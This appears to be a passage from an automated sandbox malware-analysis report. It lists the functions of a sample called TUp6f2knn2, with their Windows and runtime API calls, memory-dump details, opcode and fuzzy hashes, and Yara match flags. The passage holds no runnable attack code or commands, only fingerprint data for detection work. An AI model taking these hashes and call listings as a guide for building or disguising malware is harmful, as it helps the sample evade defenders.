B, xrefs: 0042E043, 0042E068

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: CloseFreeHandleLibrary_free
String ID: B
API String ID: 621396759-3071617958
Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98

Function 00415D8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
__CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8

Strings

pScheduler, xrefs: 00415DB2
version, xrefs: 00415D9F

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 1687795959-3154422776
Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E

Function 02565AFF Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 02565B8A
__alldvrm.LIBCMT ref: 02565D8B
__alldvrm.LIBCMT ref: 02565DAD

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction ID: 3e190deec16b94bafdde0d6418e363118b5baf2c85ea4419338c984d6c3a6454
Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction Fuzzy Hash: E2A146719807869FEB218F18C8997BEBFF2FF51314F9841ADD4859B281E7348A41CB58

Function 00435898 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00435923
__alldvrm.LIBCMT ref: 00435B24
__alldvrm.LIBCMT ref: 00435B46

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759

Function 0256FC6F Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0256FD9E

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction ID: c22af8b570801622477527cc282ac99ddb48021b437cca7d58d6e5baa49321b3
Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction Fuzzy Hash: A541F931E001126BDB346EB8EC4DABE3B76FF86770F140615F82A97690DB3459418AAD

Function 0043FA08 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043FB37

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D

Function 02566B04 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0256047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 02566B51
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02566BDA
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02566BEC
__freea.LIBCMT ref: 02566BF5

Part of subcall function 0256390E: RtlAllocateHeap.NTDLL(00000000,0253DAD7,00000000), ref: 02563940

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction ID: 92ea5332070d89d39957429e690ea8a319f32db721fe1d7a215eb14519742a81
Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction Fuzzy Hash: 5931B072A0021BEBDF258F64CC48DBE7BA9FB40714B144269EC14D72A0EB39D950CB98

Function 004236EF Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000), ref: 00423739
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721

Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D

__CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
String ID:
API String ID: 2630251706-0
Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98

Function 00401F9A Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000005), ref: 00401FAF
UpdateWindow.USER32 ref: 00401FB7
ShowWindow.USER32(00000000), ref: 00401FCB
MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Window$Show$MoveUpdate
String ID:
API String ID: 1339878773-0
Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C

Function 02559330 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0255934A

Part of subcall function 02559297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 025592C6
Part of subcall function 02559297: ___AdjustPointer.LIBCMT ref: 025592E1

_UnwindNestedFrames.LIBCMT ref: 0255935F
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02559370
CallCatchBlock.LIBVCRUNTIME ref: 02559398

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: e7dbcca477dfe8c7e7a5313f81991205ed288ea268762f3740be027db0c892a9
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 7C01F33210015AFBDF125E95CC50EAA3F6AFF88754F054019FE0856120D336E861ABA4

Function 004290C9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004290E3

Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A

_UnwindNestedFrames.LIBCMT ref: 004290F8
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
CallCatchBlock.LIBVCRUNTIME ref: 00429131

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8

Function 02565196 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0256513D,00000000,00000000,00000000,00000000,?,025653F5,00000006,0044A378), ref: 025651C8
GetLastError.KERNEL32(?,0256513D,00000000,00000000,00000000,00000000,?,025653F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,02562213), ref: 025651D4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0256513D,00000000,00000000,00000000,00000000,?,025653F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 025651E2

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 5951ab383a0b530ff8c933d7ebda5bfa8f11d24011dc775e7d72331c0faf51b3
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: BF01AC366522266BC7214F699C48E767F98BF46F617510630F956D7141E730D500C6EC

Function 00434F2F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC

Function 02556395 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 025563AF
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 025563C3
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 025563DB
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 025563F3

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: 77fed51cf3f779e4461d4774407a4845283fa3028438142317fafd449b695c8f
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 8001DB36610135A7CF15EE55C860AAF775EBF85354F410057EC11A7291DAB0ED1186A4

Function 02552B82 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 02552BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02552BCF

Part of subcall function 02548687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 025486A8
Part of subcall function 02548687: Hash.LIBCMT ref: 025486E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02552BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02552BF8

Part of subcall function 0254F6DF: Hash.LIBCMT ref: 0254F6F1

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction ID: 2af44f5c8e2b8f4fb1fc52e7e1838fb5094457d32c319d509b5e13c58def8262
Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction Fuzzy Hash: BC118E76800605AFC715DF64C881ACAF7B9BF59320F048A1EE956C7551EB70F904CFA4

Function 0042612E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8

Function 02552B91 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 02552BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02552BCF

Part of subcall function 02548687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 025486A8
Part of subcall function 02548687: Hash.LIBCMT ref: 025486E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02552BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02552BF8

Part of subcall function 0254F6DF: Hash.LIBCMT ref: 0254F6F1

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction ID: aee859b0571ca593cd0965ab3258c8da088e7a8b7c3e14799d55447526bbe635
Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction Fuzzy Hash: 35016976400605ABC714DF65C881EDAF7E9FF88320F008A1EE95A87540DB70F904CF64

Function 025350CA Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 025350D1

Part of subcall function 0253BDAE: __EH_prolog3_GS.LIBCMT ref: 0253BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 0253511C
__Getcoll.LIBCPMT ref: 0253512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0253513B

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction ID: 78aee6a672cfb49503b5be476c56786d5b646e0246f0ced5ae01ee6783e77a3d
Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction Fuzzy Hash: BC017171D1030AEFDB06EFA4C444BEDB7B1BF94316F50A42AD095AB280DBB49544CF99

Function 02535B86 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 02535B8D

Part of subcall function 0253BDAE: __EH_prolog3_GS.LIBCMT ref: 0253BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 02535BD8
__Getcoll.LIBCPMT ref: 02535BE7
std::_Locinfo::~_Locinfo.LIBCPMT ref: 02535BF7

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction ID: 589ffd860690ce3859f7c3822a00bd1e8daf3df8517651dc042d333f750bf46d
Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction Fuzzy Hash: B0015E7191020ADFDB05EFA4C484BEDB7B1BF94319F50A42AD055AB280DBB89544CF99

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00405926

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
__Getcoll.LIBCPMT ref: 00405980
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98

Function 0254C13E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0254C170
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0254C180
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0254C190
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0254C1A4

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: f6efb16c88bac1e9ee541a16427adfc09b36eb31b257c7bfba3a83bd69d6e367
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 1601FB3A006109BBDF169ED4DD018ADBF66BF9535AF049413F91884130DB32C670EB89

Function 0041BED7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D

Function 02543773 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0254378C

Part of subcall function 02542B16: ___crtGetTimeFormatEx.LIBCMT ref: 02542B2C
Part of subcall function 02542B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02542B4B

GetLastError.KERNEL32 ref: 025437A8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025437BE
__CxxThrowException@8.LIBVCRUNTIME ref: 025437CC

Part of subcall function 025428EC: SetThreadPriority.KERNEL32(?,?), ref: 025428F8

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: bb40ea549bf3ff19f017f77c5258b28bdf47e34208df091a98464c9afc42f51a
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 67F027B2A003263AD720B7718C0AFBB7A9CAF40755F500827BC40E2081EE98D4008ABC

Function 0253D486 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02541342

Part of subcall function 02540BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02540BD6
Part of subcall function 02540BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02540BF7

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02541355
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02541361
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0254136A

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction ID: bc240e3d8cc732a7599638ab5f8f45f1a2cd03c49746d00b579317549ada3f0b
Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction Fuzzy Hash: DEF02430600B06A79F187E74881057DB6A77FC132CB18857996159F7C0DE719D409B9C

Function 0040D21F Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

